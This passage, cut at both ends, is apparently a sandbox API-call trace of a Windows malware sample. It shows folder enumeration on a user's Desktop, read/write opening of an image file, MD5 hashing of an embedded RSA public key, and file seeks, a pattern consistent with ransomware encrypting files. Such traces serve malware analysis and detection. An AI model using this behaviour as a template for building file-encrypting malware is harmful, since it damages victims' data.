dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.182] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\") returned="_dSq\\" [0199.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0199.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.183] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\") returned="5Ctq03jfOkJI397\\" [0199.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0199.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0199.183] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\") returned="YnPBSI277\\" [0199.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade788 [0199.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.184] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0199.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade788 | out: hHeap=0x2c0000) returned 1 [0199.184] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.185] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.185] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.185] PathFindFileNameW (pszPath="") returned="" [0199.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.185] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x586960b0, ftCreationTime.dwHighDateTime=0x1d89e46, ftLastAccessTime.dwLowDateTime=0xb6c638c0, ftLastAccessTime.dwHighDateTime=0x1d8a4a6, ftLastWriteTime.dwLowDateTime=0xb6c638c0, ftLastWriteTime.dwHighDateTime=0x1d8a4a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0199.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.190] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x586960b0, ftCreationTime.dwHighDateTime=0x1d89e46, ftLastAccessTime.dwLowDateTime=0xb6c638c0, ftLastAccessTime.dwHighDateTime=0x1d8a4a6, ftLastWriteTime.dwLowDateTime=0xb6c638c0, ftLastWriteTime.dwHighDateTime=0x1d8a4a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.190] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bcb2460, ftCreationTime.dwHighDateTime=0x1d8994c, ftLastAccessTime.dwLowDateTime=0x352a78b0, ftLastAccessTime.dwHighDateTime=0x1d8a4a3, ftLastWriteTime.dwLowDateTime=0x352a78b0, ftLastWriteTime.dwHighDateTime=0x1d8a4a3, nFileSizeHigh=0x0, nFileSizeLow=0x2eaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EotVe.bmp", cAlternateFileName="")) returned 1 [0199.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.191] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\EotVe.bmp") returned=".bmp" [0199.191] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\EotVe.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\eotve.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.191] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=11951) returned 1 [0199.191] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.195] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2e89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.195] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.197] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.197] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2eaf, lpOverlapped=0x0) returned 1 [0199.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.198] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.199] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.199] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.199] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.199] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.199] GetLastError () returned 0x0 [0199.199] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.199] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.200] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.200] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.200] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2eb0) returned 0x2af7168 [0199.200] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade788 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade7d0 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0199.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a40 [0199.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6a28 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.205] GetCurrentThreadId () returned 0x5d8 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af59f0 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.205] GetCurrentThreadId () returned 0x5d8 [0199.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a40 [0199.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6aa0 [0199.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0199.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ab8 [0199.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a58 [0199.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a28 [0199.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.212] HeapFree (in: hHeap=0x2c0000, 